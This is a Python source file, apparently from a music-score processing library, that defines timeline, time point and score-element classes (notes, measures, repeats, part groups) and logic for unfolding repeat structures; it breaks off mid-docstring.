from scipy.interpolate import InterpolatedUnivariateSpline
from collections import defaultdict
import logging
import operator
import itertools
from numbers import Number
from ..utils.lang_utils import cached_property, ComparableMixin, iter_subclasses
from ..utils.container_utils import partition
# from annotation_tokenizer import parse_words # tokenizer, TokenizeException
# the score ontology for longer scores requires a high recursion limit
# increase when needed
sys.setrecursionlimit(100000)
logging.basicConfig()
LOGGER = logging.getLogger(__name__)
NON_ALPHA_NUM_PAT = re.compile(ur'\W', re.UNICODE)
from scipy.interpolate import interp1d
# this produces less rounding error than scipy.interpolate.interp1d
# def interp1d_old(x, y):
# return InterpolatedUnivariateSpline(x, y, k=1)
# def my_interp1d(x, y):
# def f(x_new):
# if not hasattr(x_new, "__len__"):
# x_new = np.array([x_new])
# # output values
# v = np.empty(len(x_new))
# # insert index
# i = np.searchsorted(x, x_new)
# same = x[i] == x_new
# v[same] = y[i[same]]
# if np.sum(same) < len(x_new):
# i = i[~same]
# v[~same] = y[i-1] + (y[i] - y[i - 1]) * ( x_new[~same] - x[i - 1]) / (x[i] - x[i - 1])
# # np.savetxt('/tmp/nsame.txt', np.column_stack((x_new[~same], x[i-1], x[i], y[i-1], y[i], v[~same])), fmt='%.3f')
# return v
# return f
def kahan_cumsum(x):
"""
Return the cumsum of a sequence of numbers `x` using the Kahan sum algorithm
to bound numerical error.
Parameters
----------
x: iterable over numbers
A sequence of numbers to be cumsummed
Returns
-------
ndarray: The cumsum of the elements in `x`
"""
x = np.asarray(x)
cumulator = np.zeros_like(x)
compensation = 0.0
cumulator[0] = x[0]
for i in range(1, len(x)):
y = x[i] - compensation
t = cumulator[i - 1] + y
compensation = (t - cumulator[i - 1]) - y
cumulator[i] = t
return cumulator
def divide_outside_cumsum(X):
"""
this computes np.cumsum(np.diff(X[:, 0]) / X[:-1, 1]), but produces less
rounding errors when X.dtype = int, by moving the division operation out of
the cumsum.
"""
diff = np.diff(X[:, 0])
num = kahan_cumsum([diff[i] * np.prod(X[:i, 1]) * np.prod(X[i + 1:-1, 1])
for i in range(len(X) - 1)])
den = np.prod(X[:-1, 1])
return num / np.float(den)
def _symbolic_to_numeric_duration(symbolic_dur, divs):
label_durs = {
'long': 16,
'breve': 8,
'whole': 4,
'half': 2,
'quarter': 1,
'eighth': 1./2,
'16th': 1./4,
'32nd': 1./8.,
'64th': 1./16,
'128th': 1./32,
'256th': 1./64
}
dot_multipliers = (1, 1 + 1./2, 1 + 3./4, 1 + 7./8)
numdur = divs * label_durs[symbolic_dur.get('type', 'quarter')]
numdur *= dot_multipliers[symbolic_dur.get('dots', 0)]
numdur *= float(symbolic_dur.get('normal_notes', 1)) / symbolic_dur.get('actual_notes', 1)
return numdur
def symbolic_to_numeric_duration(symbolic_durs, divs):
numdur = 0
for symbolic_dur in symbolic_durs:
numdur += _symbolic_to_numeric_duration(symbolic_dur, divs)
return numdur
# def preprocess_direction_name(l):
# try:
# to_remove = set(('COMMA','CARLOSCOMMENT', 'PARENOPEN', 'PARENCLOSE', 'TEMPOHINT'))
# tokens = tokenizer.tokenize(l)
# parts = []
# for t in tokens:
# if t.type in ('ROMAN_NUMBER', 'TEMPOHINT', 'PRIMO'):
# parts.append(t.value)
# elif t.type in to_remove:
# continue
# else:
# parts.append(t.type.lower())
# return '_'.join(parts)
# except TokenizeException as e:
# return l.lower().replace(' ', '_')
# def preprocess_direction_fallback(l):
# """
# try to convert direction name into a normalized form; some
# translation takes place to correct for common abbreviations
# (e.g. rall. for rallentando), and OCR errors; furthermore the
# string will be converted to lowercase and spaces are replaced by
# underscores
# this function is obsolete and should only be used if the ply module is not available
# Parameters
# ----------
# l : str
# a direction name
# Returns
# -------
# str
# a string containing the processed version of `l`
# """
# # TODO:
# # Lento Sostenuto -> lento
# # poco rall. -> rallentando
# # poco ritenuto -> ritenuto
# # pp e poco ritenuto -> ritenuto
# # for simplicity of equiv replacements,
# # do more normalization:
# # lkey = ln.replace(',._-','')
# lsl = l.strip().lower()
# lkey = NON_ALPHA_NUM_PAT.sub(ur'', lsl)
# # print(r, l)
# # tr = string.ascii_lowercase + '_'
# # delete_table = string.maketrans(tr, ' ' * len(tr))
# # ln = l.strip().lower()
# # lkey = ln.translate(None, delete_table)
# equivalences = {u'dim': u'diminuendo',
# u'dimin': u'diminuendo',
# u'diminuend': u'diminuendo',
# u'diminuendosempre': u'diminuendo',
# u'dirn': u'diminuendo', # OCR errors
# u'cresc': u'crescendo',
# u'cre': u'crescendo',
# u'ten': u'tenuto',
# u'cr': u'crescendo',
# u'rall': u'rallentando',
# u'espress': u'espressivo',
# u'pocoritenuto': u'ritenuto',
# u'pocoriten': u'ritenuto',
# u'pocorubato': u'ritardando',
# u'pocorall': u'rallentando',
# u'pocorallentando': u'rallentando',
# u'pizz': u'pizzicato',
# u'atenepo': u'a_tempo',
# u'rallentandomolto': u'rallentando',
# u'appasionato': u'appassionato',
# u'legatissizno': u'legatissimo',
# u'rallent': u'rallentando',
# u'rallent': u'rallentando',
# u'rit': u'ritardando',
# u'ritpocoapoco': u'ritardando',
# u'ritard': u'ritardando',
# u'riten': u'ritenuto',
# u'rinf': u'rinforzando',
# u'rinforz': u'rinforzando',
# u'smorz': u'smorzando',
# u'tenute': u'tenuto',
# u'pi\xf9_lento': u'piu_lento'
# }
# # print('lkey', lkey, equivalences.get(lkey))
# return equivalences.get(lkey, NON_ALPHA_NUM_PAT.sub(ur'_', lsl))
class TimeLine(object):
"""
The `TimeLine` class collects `TimePoint` objects in a doubly
linked list fashion (as well as in an array). Once all `TimePoint`
objects have beed added, the TimeLine can be locked (that is, no
more `TimePoint` objects can be added), in order to allow for
caching of property values (without locking the correctness of the
cached values cannot be guaranteed)
Parameters
----------
No parameters
Attributes
----------
points : numpy array of TimePoint objects
a numpy array of TimePoint objects.
locked : boolean
if the timeline is locked, no points can be added until
`unlock()` is called.
"""
def __init__(self):
self.points = np.array([], dtype=TimePoint)
self.locked = False
def lock(self):
"""
lock the time line; no points can be added until `unlock` is called
"""
self.locked = True
def unlock(self):
"""
unlock the time line; points can be added until `lock` is called
"""
self.locked = False
def link(self):
"""
double link all points in the time line
"""
for i in range(len(self.points) - 1):
self.points[i].next = self.points[i + 1]
self.points[i + 1].prev = self.points[i]
def add_point(self, tp):
"""
add `TimePoint` object `tp` to the time line
"""
if self.locked:
LOGGER.warning('Attempt to mutate locked TimeLine object')
else:
N = len(self.points)
i = np.searchsorted(self.points, tp)
if not (i < N and self.points[i].t == tp.t):
self.points = np.insert(self.points, i, tp)
if i > 0:
self.points[i - 1].next = self.points[i]
self.points[i].prev = self.points[i - 1]
if i < len(self.points) - 1:
self.points[i].next = self.points[i + 1]
self.points[i + 1].prev = self.points[i]
def get_point(self, t):
"""
return the `TimePoint` object with time `t`, or None if there
is no such object
"""
N = len(self.points)
i = np.searchsorted(self.points, TimePoint(t))
if i < N and self.points[i].t == t:
return self.points[i]
else:
return None
def get_or_add_point(self, t):
"""
return the `TimePoint` object with time `t`; if there is no
such object, create it, add it to the time line, and return
it
:param t: time value `t` (float)
:returns: a TimePoint object with time `t`
"""
tp = self.get_point(t)
if tp is None:
tp = TimePoint(t)
self.add_point(tp)
return tp
def add_starting_object(self, t, o):
"""
add object `o` as an object starting at time `t`
"""
self.get_or_add_point(t).add_starting_object(o)
def add_ending_object(self, t, o):
"""
add object `o` as an object ending at time `t`
"""
self.get_or_add_point(t).add_ending_object(o)
def get_all_of_type(self, cls, start=None, end=None, include_subclasses=False):
"""
return all objects of type `cls`
"""
if start is not None:
if not isinstance(start, TimePoint):
start = TimePoint(start)
start_idx = np.searchsorted(
self.points, start, side='left')
else:
start_idx = 0
if end is not None:
if not isinstance(end, TimePoint):
end = TimePoint(start)
end_idx = np.searchsorted(self.points, end, side='left')
else:
end_idx = len(self.points)
r = []
for tp in self.points[start_idx: end_idx]:
r.extend(tp.get_starting_objects_of_type(cls, include_subclasses))
return r
class TimePoint(ComparableMixin):
"""
A TimePoint represents an instant in Time.
Parameters
----------
t : number
Time point of some event in/element of the score, where the unit
of a time point is the <divisions> as defined in the musicxml file,
more precisely in the corresponding score part.
Represents the absolute time of the time point, also used
for ordering TimePoint objects w.r.t. each other.
label : str, optional. Default: ''
Attributes
----------
t : number
label : str
starting_objects : dictionary
a dictionary where the musical objects starting at this
time are grouped by class.
ending_objects : dictionary
a dictionary where the musical objects ending at this
time are grouped by class.
* `prev`: the preceding time instant (or None if there is none)
* `next`: the succeding time instant (or None if there is none)
The `TimeLine` class stores sorted TimePoint objects in an array
under TimeLine.points, as well as doubly linked (through the
`prev` and `next` attributes). The `TimeLine` class also has
functionality to add, remove, lock, and unlock the TimePoints.
"""
def __init__(self, t, label=''):
self.t = t
self.label = label
self.starting_objects = defaultdict(list)
self.ending_objects = defaultdict(list)
def __iadd__(self, value):
assert isinstance(value, Number)
self.t += value
return self
def __isub__(self, value):
assert isinstance(value, Number)
self.t -= value
return self
def __add__(self, value):
assert isinstance(value, Number)
new = copy(self)
new += value
return new
def __sub__(self, value):
assert isinstance(value, Number)
new = copy(self)
new -= value
return new
def __unicode__(self):
return u'Timepoint {0}: {1}'.format(self.t, self.label)
def add_starting_object(self, obj):
"""
add object `obj` to the list of starting objects
"""
obj.start = self
self.starting_objects[type(obj)].append(obj)
def add_ending_object(self, obj):
"""
add object `obj` to the list of ending objects
"""
obj.end = self
self.ending_objects[type(obj)].append(obj)
def get_starting_objects_of_type(self, otype, include_subclasses=False):
"""
return all objects of type `otype` that start at this time point
"""
if include_subclasses:
return self.starting_objects[otype] + \
list(itertools.chain(*(self.starting_objects[subcls]
for subcls in iter_subclasses(otype))))
else:
return self.starting_objects[otype]
def get_ending_objects_of_type(self, otype, include_subclasses=False):
"""
return all objects of type `otype` that end at this time point
"""
if include_subclasses:
return self.ending_objects[otype] + \
list(itertools.chain(*(self.ending_objects[subcls]
for subcls in iter_subclasses(otype))))
else:
return self.ending_objects[otype]
def get_prev_of_type(self, otype, eq=False):
"""
return the object(s) of type `otype` that start at the latest
time before this time point (or at this time point, if `eq` is True)
"""
if eq:
value = self.get_starting_objects_of_type(otype)
if len(value) > 0:
return value[:]
return self._get_prev_of_type(otype)
def _get_prev_of_type(self, otype, eq=False):
if self.prev is None:
return []
else:
r = self.prev.get_starting_objects_of_type(otype)
if r != []:
return r[:]
else:
return self.prev._get_prev_of_type(otype)
def get_next_of_type(self, otype, eq=False):
"""
return the object(s) of type `otype` that start at the earliest
time after this time point (or at this time point, if `eq` is True)
"""
if eq:
value = self.get_starting_objects_of_type(otype)
if len(value) > 0:
return value[:]
return self._get_next_of_type(otype)
def _get_next_of_type(self, otype, eq=False):
if self.next is None:
return []
else:
r = self.next.get_starting_objects_of_type(otype)
if r != []:
return r[:]
else:
return self.next._get_next_of_type(otype)
@cached_property
def next(self):
"""
return the next time point, or None if there is no such
object; this property will be set when the object is part of a
time line
"""
return None
@cached_property
def prev(self):
"""
return the previous time point, or None if there is no such
object; this property will be set when the object is part of a
time line
"""
return None
def _cmpkey(self):
"""
This method returns the value to be compared
(code for that is in the ComparableMixin class)
"""
return self.t
__hash__ = _cmpkey # shorthand?
class TimedObject(object):
"""
class that represents objects that (may?) have a start and ending
point. TO DO: check!
Used as super-class for classes representing different types of
objects in a (printed) score.
"""
def __init__(self):
self.start = None
self.end = None
# intermediate time points
self.intermediate = []
class Page(TimedObject):
def __init__(self, nr=0):
super(Page, self).__init__()
self.nr = nr
def __unicode__(self):
return u'page {0}'.format(self.nr)
class System(TimedObject):
def __init__(self, nr=0):
super(System, self).__init__()
self.nr = nr
def __unicode__(self):
return u'system {0}'.format(self.nr)
class Slur(TimedObject):
"""
Parameters
----------
voice : number
the voice the slur corresponds to, this is given by a
<voice>number_of_voice</voice> tag inside <note> ... </note>.
"""
def __init__(self, voice):
super(Slur, self).__init__()
self.voice = voice
def __unicode__(self):
return u'slur at voice {0} (ends at {1})'.format(self.voice, self.end and self.end.t)
class Repeat(TimedObject):
def __init__(self):
super(Repeat, self).__init__()
def __unicode__(self):
return u'Repeat (from {0} to {1})'.format(self.start and self.start.t, self.end and self.end.t)
class DaCapo(TimedObject):
def __init__(self):
super(DaCapo, self).__init__()
def __unicode__(self):
return u'Dacapo' # (at {0} to {1})'.format(self.start.t, self.end.t)
class Fine(TimedObject):
def __init__(self):
super(Fine, self).__init__()
def __unicode__(self):
return u'Fine'
class Fermata(TimedObject):
def __init__(self):
super(Fermata, self).__init__()
def __unicode__(self):
return u'Fermata'
class Ending(TimedObject):
"""
Object that represents one part of a 1---2--- type ending of a
musical passage (aka Volta brackets).
"""
def __init__(self, number):
super(Ending, self).__init__()
self.number = number
def __unicode__(self):
return u'Ending (from {0} to {1})'.format(self.start.t, self.end.t)
class Measure(TimedObject):
"""
Attributes
----------
number : number
the number of the measure. (directly taken from musicxml file?)
page :
system :
upbeat : boolean
"""
def __init__(self):
super(Measure, self).__init__()
self.number = None
self.page = None
self.system = None
def __unicode__(self):
return u'measure {0} at page {1}, system {2}'.format(self.number, self.page, self.system)
def get_measure_duration(self, quarter=False):
"""
Parameters
----------
quarter : ????, optional. Default: False
Returns
-------
"""
assert self.start.next is not None, LOGGER.error(
'Measure has no successor')
divs = self.start.next.get_prev_of_type(Divisions)
ts = self.start.next.get_prev_of_type(TimeSignature)
nextm = self.start.get_next_of_type(Measure)
assert len(divs) > 0
assert len(ts) > 0
assert len(nextm) > 0
measure_dur = nextm[0].start.t - self.start.t
beats = ts[0].beats
beat_type = ts[0].beat_type
div = float(divs[0].divs)
if quarter:
return measure_dur / div
else:
return beat_type * measure_dur / (4. * div)
@property
def upbeat(self):
"""Returns True if the duration of the measure
is equal to the expected duration (based on
divisions and time signature).
NOTE: What does "expected duration" refer to here?
WARNING: this property does not work reliably to detect
incomplete measures in the middle of the piece
Returns
-------
boolean
"""
assert self.start.next is not None, LOGGER.error(
'ScorePart is empty')
divs = self.start.next.get_prev_of_type(Divisions)
ts = self.start.next.get_prev_of_type(TimeSignature)
nextm = self.start.get_next_of_type(Measure)
invalid = False
if len(divs) == 0:
LOGGER.warning('ScorePart specifies no divisions')
invalid = True
if len(ts) == 0:
LOGGER.warning('ScorePart specifies no time signatures')
invalid = True
if len(nextm) == 0:
LOGGER.warning('ScorePart has just one measure')
invalid = True
if invalid:
LOGGER.warning(
'upbeat could not be determined properly, assuming no upbeat')
return False
measure_dur = nextm[0].start.t - self.start.t
beats = ts[0].beats
beat_type = ts[0].beat_type
div = float(divs[0].divs)
# this will return a boolean, so either True or False
return beat_type * measure_dur / (4 * div * beats) % 1.0 > 0.0
class TimeSignature(TimedObject):
"""
Parameters
----------
beats :
beat_type :
"""
def __init__(self, beats, beat_type):
super(TimeSignature, self).__init__()
self.beats = beats
self.beat_type = beat_type
def __unicode__(self):
return u'time signature: {0}/{1}'.format(self.beats, self.beat_type)
class Divisions(TimedObject):
"""
represents <divisions>xxx</divisions> that are used inside a measure
to set the length of a quarter note (xxx here is the value for a quarter
note, e.g. 256). This element usually is present in the first measure
of each score part.
"""
def __init__(self, divs):
super(Divisions, self).__init__()
self.divs = divs
def __unicode__(self):
return u'divisions: quarter={0}'.format(self.divs)
class Tempo(TimedObject):
def __init__(self, bpm):
super(Tempo, self).__init__()
self.bpm = bpm
def __unicode__(self):
return u'tempo: bpm={0}'.format(self.bpm)
class KeySignature(TimedObject):
"""
Parameters
----------
fifths :
mode :
"""
def __init__(self, fifths, mode):
super(KeySignature, self).__init__()
self.fifths = fifths
self.mode = mode
def __unicode__(self):
return u'key signature: fifths={0}, mode={1}'.format(self.fifths, self.mode)
class Transposition(TimedObject):
"""
represents a <transpose> tag that tells how to change all (following)
pitches of that part to put it to concert pitch (i.e. sounding pitch).
Parameters
----------
diatonic : number
chromatic : number
the number of semi-tone steps to add or subtract to the pitch to
get to the (sounding) concert pitch.
"""
def __init__(self, diatonic, chromatic):
super(Transposition, self).__init__()
self.diatonic = diatonic
self.chromatic = chromatic
def __unicode__(self):
return u'transposition: diatonic={0}, chromatic={1}'.format(self.diatonic, self.chromatic)
class Words(TimedObject):
"""
Parameters
----------
text : str
"""
def __init__(self, text):
super(Words, self).__init__()
self.text = text
def __str__(self):
return self.__unicode__().encode('utf8')
def __unicode__(self):
return u'{}: {}'.format(type(self).__name__, self.text)
class Direction(TimedObject):
"""
"""
# labels = []
# patterns = []
def __init__(self, text):
self.text = text
self.start = None
self.end = None
def __str__(self):
return self.__unicode__().encode('utf8')
def __unicode__(self):
return u'{}: {}'.format(type(self).__name__, self.text)
class TempoDirection(Direction): pass
class DynamicTempoDirection(TempoDirection):
def __init__(self, text):
Direction.__init__(self, text)
self.intermediate = []
class ConstantTempoDirection(TempoDirection): pass
class ResetTempoDirection(ConstantTempoDirection): pass
class LoudnessDirection(Direction): pass
class DynamicLoudnessDirection(LoudnessDirection):
def __init__(self, text):
Direction.__init__(self, text)
self.intermediate = []
class ConstantLoudnessDirection(LoudnessDirection): pass
class ImpulsiveLoudnessDirection(LoudnessDirection): pass
class Note(TimedObject):
"""
represents a note.
Parameters
----------
step : str
the basic pitch class, like 'C', 'D', 'E', etc.
alter: integer
number of semi-tones to alterate the note from its basic pitch
given by `step`.
Note that the musicxml standard in principle allows for this to
be a float number for microtones (micro-intonation). In Midi this
would/could then translate to a pitch-bend.
octave : integer
the octave where octave 4 is the one having middle C (C4).
voice : integer, optional. Default: None
id : integer, optional. Default: None
...
Attributes
----------
previous_notes_in_voice :
simultaneous_notes_in_voice :
next_notes_in_voice :
midi_pitch : integer
morphetic_pitch :
alter_sign :
duration :
"""
def __init__(self, step, alter, octave, voice=None, id=None,
symbolic_duration=None,
grace_type=None, steal_proportion=None,
staccato=False, fermata=False, accent=False,
coordinates=None, staff=None):
super(Note, self).__init__()
self.step = step
if alter not in (None, 0, 1, 2, 3, -1, -2, 3):
print('alter', step, alter, octave)
raise Exception()
if alter == 0:
alter = None
self.alter = alter
self.octave = octave
self.voice = voice
self.id = id
self.grace_type = grace_type
self.steal_proportion = steal_proportion
self.staccato = staccato
self.fermata = fermata
self.accent = accent
self.staff = staff
self.coordinates = coordinates
self.symbolic_durations = []
if symbolic_duration is not None:
self.symbolic_durations.append(symbolic_duration)
@property
def previous_notes_in_voice(self):
n = self
while True:
nn = n.start.get_prev_of_type(Note)
if nn == []:
return nn
else:
voice_notes = [m for m in nn if m.voice == self.voice]
if len(voice_notes) > 0:
return voice_notes
n = nn[0]
@property
def simultaneous_notes_in_voice(self):
return [m for m in self.start.starting_objects[Note]
if m.voice == self.voice and m != self]
@property
def next_notes_in_voice(self):
n = self
while True:
nn = n.start.get_next_of_type(Note)
if nn == []:
return nn
else:
voice_notes = [m for m in nn if m.voice == self.voice]
if len(voice_notes) > 0:
return voice_notes
n = nn[0]
@property
def midi_pitch(self):
"""
the midi pitch value of the note (MIDI note number).
C4 (middle C, in german: c') is note number 60.
Returns
-------
integer
the note's pitch as MIDI note number.
"""
base_class = {'c': 0, 'd': 2, 'e': 4, 'f': 5,
'g': 7, 'a': 9, 'b': 11}[self.step.lower()] + (self.alter or 0)
return (self.octave + 1) * 12 + base_class
@property
def morphetic_pitch(self):
"""
the morphetic value of the note, i.e. a single integer.
It corresponds to the (vertical) position of the note in
the barline system.
Returns
-------
integer
"""
base_class = {'c': 0, 'd': 1, 'e': 2, 'f': 3,
'g': 4, 'a': 5, 'b': 6}[self.step.lower()]
octave_number = {0: 32, 1: 39, 2: 46, 3: 53,
4: 60, 5: 67, 6: 74, 7: 81,
8: 89}[self.octave]
return octave_number + base_class
@property
def alter_sign(self):
"""
the alteration of the note
Returns
-------
str
"""
return {None: ' ', 1: '#', 2: 'x', -1: 'b', -2: 'bb'}[self.alter]
@property
def duration(self):
"""
the duration of the note in divisions
Returns
-------
number
"""
try:
return self.end.t - self.start.t
except:
LOGGER.warn('no end time found for note')
return 0
@property
def duration_from_symbolic(self):
divs = self.start.get_prev_of_type(Divisions, True)
if len(divs) == 0:
div = 1
else:
div = divs[0].divs
# TODO: it is theoretically possible that the divisions change
# in between tied notes. The current assumes this does not happen.
return symbolic_to_numeric_duration(self.symbolic_durations, div)
def __unicode__(self):
return u'{0}{1}{2} ({8}-{9}, midi: {3}, duration: {5}, voice: {4}, id: {6}, {7})'\
.format(self.alter_sign, self.step, self.octave,
self.midi_pitch, self.voice, self.duration,
self.id or '', self.grace_type if self.grace_type else '',
self.start and self.start.t, self.end and self.end.t)
def get_all_score_parts(constituents):
"""
From a list whose elements are either ScorePart objects or
PartGroup objects, return an ordered list of ScorePart objects.
Parameters:
-----------
constituents : iterable
a list of ScorePart/PartGroup objects
Returns:
--------
iterable
a list of all ScorePart objects embedded in `constituents`
"""
return [score_part for constituent in constituents
for score_part in
((constituent,) if isinstance(constituent, ScorePart)
else get_all_score_parts(constituent.constituents))]
class PartGroup(object):
"""
represents a <part-group ...> </...> where instruments are grouped.
Note that a part grouped is "started" and "stopped" with according
attributes inside the respective elements.
Parameters
----------
grouping_symbol : str OR None, optional
the symbol used for grouping instruments, a <group-symbol> element,
possibilites are:
- 'brace' (opening curly brace, should group 2 same instruments,
e.g. 2 horns, or left + right hand on piano)
- 'square' (opening square bracket, should have same function as
the brace.)
- 'bracket' (opening square bracket, should group instruments
of the same category, such as all woodwinds.)
Note that there is supposed to be a hierarchy between these,
like this: a bracket is supposed to embrace one ore multiple
braces or squares.
Attributes
----------
grouping_symbol : str OR None
constituents : list of PartGroup objects
parent :
number :
score_parts : list of ScorePart objects
a list of all ScorePart objects in this PartGroup
"""
def __init__(self, grouping_symbol=None, name=None):
self.grouping_symbol = grouping_symbol
self.constituents = []
self.name = name
self.parent = None
self.number = None
@property
def score_parts(self):
return get_all_score_parts(self.constituents)
def pprint(self, l=0):
if self.name is not None:
name_str = u' / {0}'.format(self.name)
else:
name_str = u''
s = [u' ' * l + u'{0}{1}'.format(self.grouping_symbol, name_str)]
for ch in self.constituents:
s.append(ch.pprint(l + 1))
return u'\n'.join(s)
class ScoreVariant(object):
def __init__(self, start_time=0):
self.t_unfold = start_time
self.segments = []
def add_segment(self, start, end):
self.segments.append((start, end, self.t_unfold))
self.t_unfold += (end.t - start.t)
def get_segments(self):
"""return segment (start, end, offset) information for each of
the segments in the score variant.
PHENICX NOTE: these numbers can be inserted directly into the
ScoreVariantSequence table, as "ScoreStartBeat",
"ScoreStopBeat", and "Offset", respectively
"""
return [(s.t, e.t, 0 if i > 0 else o)
for i, (s, e, o) in enumerate(self.segments)]
def clone(self):
clone = ScoreVariant(self.t_unfold)
clone.segments = self.segments[:]
return clone
class ScorePart(object):
"""
Represents a whole score part, e.g. all notes of one single instrument
or 2 instruments written in the same staff.
Note that there may be more than one staff per score part; vice versa,
in the printed score, there may be more than one score part's notes
in the same staff (such as two flutes in one staff, etc).
Parameters
----------
part_id : str
the id of the part (<score-part id="P1">), will look
like 'P1' for part 1, etc.
tl : TimeLine object OR None, optional
Attributes
----------
part_id : str
timeline : TimeLine object
part_name : str
as taken from the musicxml file
part_abbreviation : str
as taken from the musicxml file
notes :
notes_unfolded :
beat_map : scipy interpolate interp1d object
the timeline on a beat basis, i.e. defined on the currently
present time signature's denominator (may vary throughout the score).
Each timepoint of the timeline is expressed as a (fraction) of
a beat number.
quarter_map : scipy interpolate interp1d object
the timeline on a quarter note basis. Each timepoint of
the timeline is be expressed as a (fraction of) a quarter
note.
"""
def __init__(self, part_id, tl=None):
self.part_id = part_id
self.timeline = TimeLine() if tl is None else tl
self.parent = None
self.part_name = None
self.part_abbreviation = None
@property
def part_names(self):
# get instrument name parts recursively
chunks = []
if self.part_name is not None:
chunks.append(self.part_name)
yield self.part_name
part = self.parent
while part is not None:
if part.name is not None:
chunks.insert(0, part.name)
yield u' '.join(chunks)
part = part.parent
def make_score_variants(self):
"""
Create a list of ScoreVariant objects, each representing a
distinct way to unfold the score, based on the repeat
structure.
Parameters
----------
Returns
-------
"""
LOGGER.warning(('Generation of repeat structures involving da '
'capo/fine/coda/segno directions is not (properly) '
'implemented yet'))
import pdb
# pdb.set_trace()
repeats = self.timeline.get_all_of_type(Repeat)
# t_score is used to keep the time in the score
t_score = TimePoint(0)
# the last time instance in the piece
end_point = self.timeline.points[-1]
# t_unfold is used to keep the time in the score variant
# t_unfold = 0
# times will aggregate the triples that make up the result
times = []
# flag that tells... if we've reached a "da capo" sign in the
# score
reached_dacapo = False
svs = [ScoreVariant()]
# each repeat holds start and end time of a score interval to
# be repeated
for repeat in repeats:
new_svs = []
for sv in svs:
# is the start of the repeat after our current score
# position?
if repeat.start > t_score:
# yes: add the tuple (t_score, repeat.start) to the
# result this is the span before the interval that is
# to be repeated
# times.append((t_score, repeat.start, t_unfold))
sv.add_segment(t_score, repeat.start)
# get any "endings" (e.g. 1 / 2 volta) of the repeat
# (there are not supposed to be more than one)
endings = repeat.end.get_ending_objects_of_type(Ending)
# create a new ScoreVariant for the repetition (sv
# will be the score variant where this repeat is
# played only once)
new_sv = sv.clone()
# is there an ending?
if len(endings) > 0:
# yes
ending = endings[0]
# add the first occurrence of the repeat
sv.add_segment(repeat.start, ending.start)
# we are in the second iteration of the repeat, so
# only add the interval of the repeat up to the ending
# (rather than up to the end of the repeat)
# add the first occurrence of the repeat
new_sv.add_segment(repeat.start, repeat.end)
new_sv.add_segment(repeat.start, ending.start)
else:
# add the first occurrence of the repeat
sv.add_segment(repeat.start, repeat.end)
# no: add the full interval of the repeat (the second time)
new_sv.add_segment(repeat.start, repeat.end)
new_sv.add_segment(repeat.start, repeat.end)
# this repeat has been handled, update the score time
t_score = repeat.end
# add both score variants
new_svs.append(sv)
new_svs.append(new_sv)
svs = new_svs
# are we at the end of the piece already?
if t_score < end_point:
# no, append the interval from the current score
# position to the end of the piece
for sv in svs:
sv.add_segment(t_score, end_point)
return svs
def test_timeline(self):
"""
Test if all ending objects have occurred as starting object as
well.
"""
s = set()
for tp in self.timeline.points:
for k, oo in tp.starting_objects.items():
for o in oo:
s.add(o)
for k, oo in tp.ending_objects.items():
for o in oo:
assert o in s
s.remove(o)
LOGGER.info('Timeline is OK')
def _make_repeat_structure(self):
"""
Return a list of sequence times based on the repeat structure
of the piece, that can be used to create an unfolded timeline.
Returns
-------
list
A list of triples (s, e, o), where s is the score start
time of a segment, e is the score end time of a segment,
and o is the absolute (score variant) start time of that
segment in the unfolded score
"""
LOGGER.warning('Generation of repeat structures involving da'
' capo/fine/coda/segno directions is not (properly)'
' implemented yet')
repeats = self.timeline.get_all_of_type(Repeat)
dacapos = self.timeline.get_all_of_type(DaCapo)
fines = self.timeline.get_all_of_type(Fine)
if len(dacapos) > 0:
dacapo = dacapos[0]
else:
dacapo = None
if len(fines) > 0:
fine = fines[0]
else:
fine = None
# t_score is used to keep the time in the score
t_score = TimePoint(0)
# the last time instance in the piece
end_point = self.timeline.points[-1]
# t_unfold is used to keep the time in the score variant
t_unfold = 0
# times will aggregate the triples that make up the result
times = []
# flag that tells... if we've reached a "da capo" sign in the
# score
reached_dacapo = False
# each repeat holds start and end time of a score interval to
# be repeated
for repeat in repeats:
# is the start of the repeat after our current score
# position?
if repeat.start > t_score:
# yes: add the tuple (t_score, repeat.start) to the
# result this is the span before the interval that is
# to be repeated
times.append((t_score, repeat.start, t_unfold))
# increase t_unfold by the interval [t_score,
# repeat.start]
t_unfold += (repeat.start.t - t_score.t)
# add the first occurrence of the repeat
times.append((repeat.start, repeat.end, t_unfold))
# update t_unfold accordingly
t_unfold += (repeat.end.t - repeat.start.t)
# is there a da capo within the repeat interval?
if dacapo is not None and repeat.start < dacapo.start <= repeat.end:
# yes: set the reached_dacapo flag
reached_dacapo = True
# play the second time only up to the da capo, and
# stop processing further repeats
times.append((repeat.start, dacapo.start, t_unfold))
# update t_unfold accordingly
t_unfold += (dacapo.start.t - repeat.start.t)
break
# get any "endings" (e.g. 1 / 2 volta) of the repeat
# (there are not supposed to be more than one)
endings = repeat.end.get_ending_objects_of_type(Ending)
# is there an ending?
if len(endings) > 0:
# yes
ending = endings[0]
# we are in the second iteration of the repeat, so
# only add the interval of the repeat up to the ending
# (rather than up to the end of the repeat)
times.append((repeat.start, ending.start, t_unfold))
# update t_unfold accordingly
t_unfold += (ending.start.t - repeat.start.t)
else:
# no: add the full interval of the repeat (the second time)
times.append((repeat.start, repeat.end, t_unfold))
# update t_unfold accordingly
t_unfold += (repeat.end.t - repeat.start.t)
# this repeat has been handled, update the score time
t_score = repeat.end
# are we at a da capo sign?
if reached_dacapo:
# yes; is there a fine?
if fine is not None:
# yes
# get the notes starting at the fine sign
notes = fine.start.get_starting_objects_of_type(Note)
# TODO: the following appears to be incorrect, the
# musicxml spec says the fine *follows* the last notes
# to be played, so the end point should always be the
# time instance of the fine sign, unless otherwise stated:
# TODO: if "fine" is a number, treat it as the quarter
# duration that all final notes are supposed to have,
# rather than have all the notes keep their own
# duration
# are there any notes starting at the fine sign?
if len(notes) > 0:
# yes: get the off times
off_times = np.array([n.end.t for n in notes])
# set the end point of the next interval to the
# latest off time
end_point = notes[np.argmax(off_times)].end
else:
# no: set the end point of the next interval to
# the time of the fine sign
end_point = fine.start
# add the interval from the start of the piece to
# end_point, which is either:
# 1. the end of the piece (no fine sign)
# 2. the time of the fine sign (no notes start at fine sign)
# 3. the offset of the longest note played at a fine sign (notes
# start at fine sign)
times.append((self.timeline.points[0], end_point, t_unfold))
else:
# not at a da capo sign
# are we at the end of the piece already?
if t_score < end_point:
# no, append the interval from the current score
# position to the end of the piece
times.append((t_score, end_point, t_unfold))
# for s, e, o in times:
# print(s.t, e.t, o)
return times
def unfold_timeline(self):
"""
Return a new TimeLine, where all repeat structures are
unfolded. This includes 1/2 endings (volta brackets),
and Da Capo al Fine structures. In this new timeline, both the
timepoints and the musical objects are copied to unfold the
structure. Note that the ID attributes of the musical objects
